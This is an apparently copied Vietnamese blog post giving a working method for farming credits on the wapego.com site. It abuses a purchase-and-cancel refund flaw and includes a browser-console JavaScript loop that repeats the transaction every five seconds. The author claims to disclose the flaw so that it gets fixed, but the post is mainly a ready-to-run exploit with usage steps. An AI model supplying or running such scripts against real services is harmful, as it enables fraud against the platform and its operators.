>

Hiện nay có nhiều người cũng biết cách hack tín dụng rồi. Nhưng hack tín dụng để bán thì không sao, còn việc hack tín dụng để quảng cáo hay chửi tục ghi tiêu đề có nội dung bậy bạ thì không thể chấp nhận được.

Cách hack thì nhiều bạn cũng hỏi An và đề nghị An share riêng nhưng An đã share thì công khai. Sau một khoảng thời gian suy nghĩ An quyết định share cách hack (thủ thuật thì dúng hơn) do lỗi ego. Bài share này An cũng sẽ đăng tại diễn đàn ego để ego nó fix. Tuy An nói bỏ ego nhưng vẫn còn có chút xíu quan tâm ego.

Về việc này An đã nghe thử các ý kiến của [link, mad, huypy, Ut Khờ]

Kelry xem rồi report ego nha.

Share để fix chứ không phải đề mn biết mà phá!

Đường dẫn liên quan: Cài đặt module -> Quản lý thông tin người dùng -> Gỡ bỏ hoạt động người dùng -> Nhập mật khẩu (cái này là nơi mua chức năng xóa mem theo thời gian quy định)

Vào lại theo dường dẫn đó để hủy mua chức năng đó. Thế là bạn được 50 tín dụng.

Vào wapego.com/credits.php để xem.

Nhưng mỗi lần làm như thế thì chỉ 50 tín dụng quá ít. Dưới đây là thủ thuật.. An test 1 phút là 20k tín dụng.

Dùng Google Chrome vào đến http://wapego.com/credits.php?id=inac_users

Nhấn F12 mở console lên. Việc dùng console nó nhanh gọn hơn dùng php curl nên An chọn cách này để hướng dẫn.

Dán cái này vào:

JS
 1. msS_form=document.forms[0];
 2. msS_form.pass.value="thaian2009";
 3. xmlhttp = new XMLHttpRequest();
 4. http = new XMLHttpRequest();
 5. function msS_get(){
 6. var url = "/credits.php?id=inac_users_can&ok=1";
 7.  
 8. xmlhttp.onreadystatechange = function() {
 9. if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
 10. }
 11. };
 12. xmlhttp.open("GET", url, true);
 13. xmlhttp.send();
 14. }
 15. function msS_post(){
 16. var url = msS_form.action;
 17. var params = "time=30&pass="+msS_form.pass.value+"&xss="+msS_form.xss.value;
 18. http.open("POST", url, true);
 19. http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
 20. http.onreadystatechange = function() {
 21. if(http.readyState == 4 && http.status == 200) {
 22. msS_get();
 23. }
 24. }
 25. http.send(params);
 26. }
 27. setInterval(function(){msS_post()},5000);


Lưu ý: số 5000 đó là 5 giây thực hiện 1 lần An không hy vọng ai giảm nó đâu [*]

thay thaian2009 thành pass wapego của bạn.

Nguồn: http://cobethoitiet.wap.mu
Copy từ Phonho.net

hack-tin-dung-wapego
DMCA.com Protection Status
Cùng Chuyên Mục
Xem thêm
Comment
Tên bạn
Nội dung


Bình luận rỗng.

Close

ảnh cm Contact Facebook
ảnh cm Contact Google+
ảnh cm Blog Trương Minh Đức
Facebook Google+ YouTube
Được tài trợ bởi